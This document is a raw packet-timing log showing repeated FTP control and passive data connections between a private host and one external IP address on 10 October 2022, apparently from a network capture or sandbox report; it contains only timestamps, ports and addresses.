                                                                                                                                    Oct 10, 2022 06:03:34.788289070 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.814107895 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.814269066 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.814285994 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.814287901 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.814351082 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.824784040 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.847609997 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.847727060 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.847882032 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.870589018 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.870680094 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.870879889 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.893444061 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.893568993 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.893708944 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.916721106 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.916850090 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.917247057 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.939822912 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.939923048 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.945470095 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.968534946 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.968684912 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.972517967 CEST5000064690192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.995527029 CEST6469050000185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:34.995630980 CEST5000064690192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:34.996030092 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.019474030 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.019661903 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.020272017 CEST5000064690192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.042578936 CEST6469050000185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.042924881 CEST6469050000185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.043029070 CEST5000064690192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.043653011 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.043808937 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.053842068 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.076508999 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.076570034 CEST2149999185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.076658010 CEST4999921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.199505091 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.223470926 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.223630905 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.252365112 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.252583027 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.252599955 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.252634048 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.252677917 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.252707005 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.253319979 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.278217077 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.278402090 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.278472900 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.302769899 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.302896976 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.303178072 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.327775955 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.327894926 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.330724955 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.356210947 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.356426001 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.356729031 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.386100054 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.386255980 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.387217045 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.413714886 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.413880110 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.414151907 CEST5000264691192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.438797951 CEST6469150002185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.439034939 CEST5000264691192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.439868927 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.466365099 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.466785908 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.474598885 CEST5000264691192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.499320984 CEST6469150002185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.499676943 CEST6469150002185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.499769926 CEST5000264691192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.501327038 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.501537085 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.503892899 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.528422117 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.528477907 CEST2150001185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.528779030 CEST5000121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.656189919 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.679167032 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.680670023 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.706521988 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.706572056 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.706696987 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.706756115 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.706803083 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.707027912 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.730174065 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.733058929 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.733192921 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.756047964 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.756298065 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.756477118 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.779390097 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.779938936 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.780123949 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.804986954 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.805715084 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.806199074 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.830843925 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.831010103 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.832824945 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.856430054 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.856527090 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.856972933 CEST5000464692192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.882076025 CEST6469250004185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.883934021 CEST5000464692192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.884211063 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.909949064 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.910043955 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.910573959 CEST5000464692192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.935863018 CEST6469250004185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.935966015 CEST6469250004185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.936085939 CEST5000464692192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.936311007 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.936844110 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.937194109 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:35.959912062 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.959954023 CEST2150003185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:35.960211992 CEST5000321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.080409050 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.105684996 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.105864048 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.134748936 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.135070086 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.135313988 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.135515928 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.135603905 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.137667894 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.163786888 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.163929939 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.164123058 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.196285009 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.196517944 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.196856022 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.221832037 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.225797892 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.226274014 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.250345945 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.253834963 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.254725933 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.278608084 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.281775951 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.285825968 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.311192989 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.311506033 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.312037945 CEST5000664693192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.335083008 CEST6469350006185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.335366011 CEST5000664693192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.335861921 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.360923052 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.365722895 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.366277933 CEST5000664693192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.389188051 CEST6469350006185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.389303923 CEST6469350006185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.389385939 CEST5000664693192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.389962912 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.390038013 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.390192986 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.415672064 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.415760040 CEST2150005185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.416096926 CEST5000521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.525870085 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.550259113 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.553560972 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.580832005 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.580892086 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.580924034 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.581248045 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.581703901 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.605561972 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.605727911 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.605870962 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.631757021 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.632004023 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.632256031 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.656601906 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.657896042 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.658196926 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.682019949 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.682317019 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.682671070 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.708250999 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.708492041 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.709374905 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.735239029 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.735476017 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.736588001 CEST5000864694192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.759448051 CEST6469450008185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.759556055 CEST5000864694192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.759833097 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.783962011 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.784184933 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.784648895 CEST5000864694192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.808243990 CEST6469450008185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.808301926 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.808319092 CEST6469450008185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.808475971 CEST5000864694192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.809057951 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.810705900 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.834492922 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.834510088 CEST2150007185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.834629059 CEST5000721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.944854975 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.967662096 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.967845917 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.993753910 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.993809938 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.993855953 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.993886948 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.994029045 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:36.994105101 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:36.994575977 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.017102003 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.017221928 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.018151045 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.040715933 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.040787935 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.040962934 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.063452959 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.063740969 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.063843012 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.086844921 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.087099075 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.087872028 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.110354900 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.110523939 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.112715960 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.135778904 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.135977983 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.136389017 CEST5001064695192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.159786940 CEST6469550010185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.159898043 CEST5001064695192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.160228014 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.183933020 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.184096098 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.184832096 CEST5001064695192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.207741976 CEST6469550010185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.207803965 CEST6469550010185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.207838058 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.208035946 CEST5001064695192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.208050013 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.208205938 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.230482101 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.230506897 CEST2150009185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.230746031 CEST5000921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.336379051 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.361298084 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.361470938 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.391433001 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.391489983 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.391509056 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.391561031 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.391855955 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.391855955 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.417826891 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.418020010 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.418301105 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.446916103 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.447129011 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.447303057 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.473675013 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.473776102 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.473980904 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.499680042 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.499783993 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.500195980 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.526230097 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.526376963 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.532912016 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.558954000 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.559058905 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.559628963 CEST5001264696192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.584434986 CEST6469650012185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.584779024 CEST5001264696192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.597937107 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.623512030 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.623593092 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.624162912 CEST5001264696192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.649281979 CEST6469650012185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.649322987 CEST6469650012185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.649482012 CEST5001264696192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.652667046 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.652750015 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.654539108 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.679183960 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.679702044 CEST2150011185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.679774046 CEST5001121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.806205988 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.829224110 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.829340935 CEST5001321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:37.855978012 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.855997086 CEST2150013185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:37.856075048 CEST5001321192.168.2.3185.106.92.60
